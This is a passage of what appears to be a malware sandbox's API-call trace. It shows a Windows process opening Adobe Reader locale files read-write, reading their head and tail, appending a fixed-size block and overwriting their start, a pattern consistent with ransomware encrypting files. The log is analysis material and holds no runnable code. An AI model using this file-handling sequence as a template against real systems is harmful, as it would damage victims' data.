hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0072.067] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0072.067] CloseHandle (hObject=0x1fc) returned 1 [0072.067] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\RdLang32.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\rdlang32.esp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0072.068] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0072.068] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x156a00 [0072.068] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0072.068] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.068] ReleaseMutex (hMutex=0x168) returned 1 [0072.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.ESP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0072.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.ESP", cchWideChar=12, lpMultiByteStr=0x1f7340c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RdLang32.ESP", lpUsedDefaultChar=0x0) returned 12 [0072.069] ReadFile (in: hFile=0x1fc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0072.072] ReadFile (in: hFile=0x1fc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.072] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x155a00 [0072.073] ReadFile (in: hFile=0x1fc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.075] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x155a00 [0072.075] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.076] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0072.076] WriteFile (in: hFile=0x1fc, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0072.076] WriteFile (in: hFile=0x1fc, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0072.076] CloseHandle (hObject=0x1fc) returned 1 [0072.077] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Spelling.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\es_es\\spelling.esp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0072.482] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0072.482] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x2a00 [0072.483] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0072.483] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.483] ReleaseMutex (hMutex=0x168) returned 1 [0072.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.ESP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0072.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.ESP", cchWideChar=12, lpMultiByteStr=0x1f7328c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Spelling.ESP", lpUsedDefaultChar=0x0) returned 12 [0072.483] ReadFile (in: hFile=0x1fc, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.501] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1a00 [0072.502] ReadFile (in: hFile=0x1fc, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.502] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1a00 [0072.503] WriteFile (in: hFile=0x1fc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.503] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0072.503] WriteFile (in: hFile=0x1fc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0072.504] CloseHandle (hObject=0x1fc) returned 1 [0072.504] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Checkers.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\checkers.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0072.505] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0072.505] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1e000 [0072.505] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0072.505] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.506] ReleaseMutex (hMutex=0x168) returned 1 [0072.506] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.EUQ", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0072.506] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.EUQ", cchWideChar=12, lpMultiByteStr=0x1f7346c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Checkers.EUQ", lpUsedDefaultChar=0x0) returned 12 [0072.506] ReadFile (in: hFile=0x1fc, lpBuffer=0x2664638, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2664638*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0072.513] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1d000 [0072.514] ReadFile (in: hFile=0x1fc, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.515] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1d000 [0072.516] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.516] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0072.516] WriteFile (in: hFile=0x1fc, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0072.516] CloseHandle (hObject=0x1fc) returned 1 [0072.517] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\pddom.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\pddom.euq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0072.517] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0072.518] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x2c00 [0072.518] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0072.518] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.518] ReleaseMutex (hMutex=0x168) returned 1 [0072.518] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.EUQ", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0072.518] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.EUQ", cchWideChar=9, lpMultiByteStr=0x1f7328c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pddom.EUQ", lpUsedDefaultChar=0x0) returned 9 [0072.518] ReadFile (in: hFile=0x1fc, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.534] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1c00 [0072.534] ReadFile (in: hFile=0x1fc, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.534] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1c00 [0072.535] WriteFile (in: hFile=0x1fc, lpBuffer=0x2669ac8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669ac8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.536] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0072.536] WriteFile (in: hFile=0x1fc, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0072.536] CloseHandle (hObject=0x1fc) returned 1 [0072.537] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\Services\\DEXShare.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\eu_es\\services\\dexshare.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0072.601] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0072.601] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x9251 [0072.601] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0072.601] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.602] ReleaseMutex (hMutex=0x168) returned 1 [0072.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0072.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DEXShare.asfx", lpUsedDefaultChar=0x0) returned 13 [0072.602] ReadFile (in: hFile=0x1fc, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0073.663] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x8251 [0073.664] ReadFile (in: hFile=0x1fc, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.028] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x8251 [0075.035] WriteFile (in: hFile=0x1fc, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.035] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0075.036] WriteFile (in: hFile=0x1fc, lpBuffer=0x25aa1a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25aa1a8*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0075.041] CloseHandle (hObject=0x1fc) returned 1 [0075.057] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\Annots.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\annots.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0075.682] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0075.682] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x77800 [0075.682] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0075.682] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.682] ReleaseMutex (hMutex=0x168) returned 1 [0075.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.SUO", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0075.682] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.SUO", cchWideChar=10, lpMultiByteStr=0x1f7366c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Annots.SUO", lpUsedDefaultChar=0x0) returned 10 [0075.683] ReadFile (in: hFile=0x1fc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0075.685] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x76800 [0075.685] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.687] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x76800 [0075.687] WriteFile (in: hFile=0x1fc, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.687] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0075.687] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0075.688] CloseHandle (hObject=0x1fc) returned 1 [0075.688] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\makeaccessible.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\makeaccessible.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0075.689] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0075.690] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x12800 [0075.690] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0075.690] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.690] ReleaseMutex (hMutex=0x168) returned 1 [0075.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.SUO", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0075.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.SUO", cchWideChar=18, lpMultiByteStr=0x1f88ba4, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="makeaccessible.SUO", lpUsedDefaultChar=0x0) returned 18 [0075.690] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0075.692] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x11800 [0075.693] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.693] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x11800 [0075.694] WriteFile (in: hFile=0x1fc, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.694] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0075.694] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0075.695] CloseHandle (hObject=0x1fc) returned 1 [0075.695] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fi_FI\\Search.SUO" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fi_fi\\search.suo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0075.697] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0075.697] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x5a00 [0075.697] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0075.697] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.698] ReleaseMutex (hMutex=0x168) 